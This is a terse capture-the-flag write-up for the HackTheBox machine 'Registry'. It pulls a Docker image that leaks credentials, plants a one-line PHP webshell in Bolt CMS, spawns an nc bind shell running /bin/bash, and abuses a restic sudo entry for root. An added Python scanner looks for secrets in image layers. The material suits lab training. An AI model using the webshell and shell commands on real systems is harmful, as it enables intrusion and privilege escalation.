Registry @ HackTheBox

Registry is a 40-point machine on HackTheBox that involves interacting with a Docker registry to download a Docker image and finding a password and an SSH private key inside it. For root, we exploit a flaw in Bolt CMS to upload a webshell and then abuse a sudo entry that allows us to start restic backup as root.

Notes

/etc/docker/daemon.json:

{
  "insecure-registries" : ["docker.registry.htb:80"]
}

docker:

sudo systemctl restart docker
docker login docker.registry.htb:80
docker pull docker.registry.htb:80/bolt-image:latest
docker image ls
docker image inspect <image id>
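
The leak this box depends on (a password and an SSH private key baked into an image layer) can be caught before an image is pushed. The following is an added example, not code from the original post: it walks every layer of a `docker save` archive and flags private-key material and password-looking assignments. The function names, the two regex heuristics and the archive built in `demo_archive` are assumptions constructed for illustration.

```python
import io, json, re, tarfile

# Heuristics for the two kinds of secret the write-up found inside the image.
PATTERNS = {
    "private-key": re.compile(rb"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----"),
    "password": re.compile(rb"(?i)pass(?:word|wd|phrase)\s*[:=]\s*\S+"),
}

def _open(data):
    # "r:*" lets tarfile detect plain or compressed layers transparently.
    return tarfile.open(fileobj=io.BytesIO(data), mode="r:*")

def scan_image_archive(archive, max_size=1 << 20):
    """Return sorted (layer, path, finding) tuples for a `docker save` tarball."""
    findings = set()
    with _open(archive) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_name in (l for entry in manifest for l in entry["Layers"]):
            with _open(image.extractfile(layer_name).read()) as layer:
                for member in layer:
                    # Regular files only; skip large blobs to bound memory use.
                    if not member.isfile() or member.size > max_size:
                        continue
                    data = layer.extractfile(member).read()
                    findings.update((layer_name, member.name, kind)
                                    for kind, rx in PATTERNS.items() if rx.search(data))
    return sorted(findings)

def _tar(files):
    """Build an in-memory tar from {name: bytes} (used for the sample only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as out:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            out.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def demo_archive():
    """Constructed sample image: one clean layer, one layer with secrets."""
    key = b"-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED\n-----END RSA PRIVATE KEY-----\n"
    leaky = _tar({"root/.ssh/id_rsa": key, "app/config.env": b"DB_PASSWORD=constructed\n"})
    manifest = json.dumps([{"Layers": ["a/layer.tar", "b/layer.tar"]}]).encode()
    return _tar({"manifest.json": manifest,
                 "a/layer.tar": _tar({"etc/hostname": b"demo\n"}),
                 "b/layer.tar": leaky})

if __name__ == "__main__":
    for finding in scan_image_archive(demo_archive()):
        print(finding)
```

For a real image, pass the bytes of the file written by `docker save <image> -o image.tar`. Files deleted in a later layer still show up, because each layer is scanned on its own.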

bolt webshell:

<?php echo system($_REQUEST['xcmd']);?>

http://registry.htb/bolt/files/xct.php?xcmd=nc.traditional+-lp+2000+-e /bin/bash

restic docs:

https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html

restic exploit:

sudo /usr/bin/restic backup -r rest/ -r sftp:bolt@127.0.0.1:/var/tmp/rest -o sftp.command="nc.traditional -lp 2000 -e /bin/bash" /proc/version

This post is licensed under CC BY 4.0 by the author.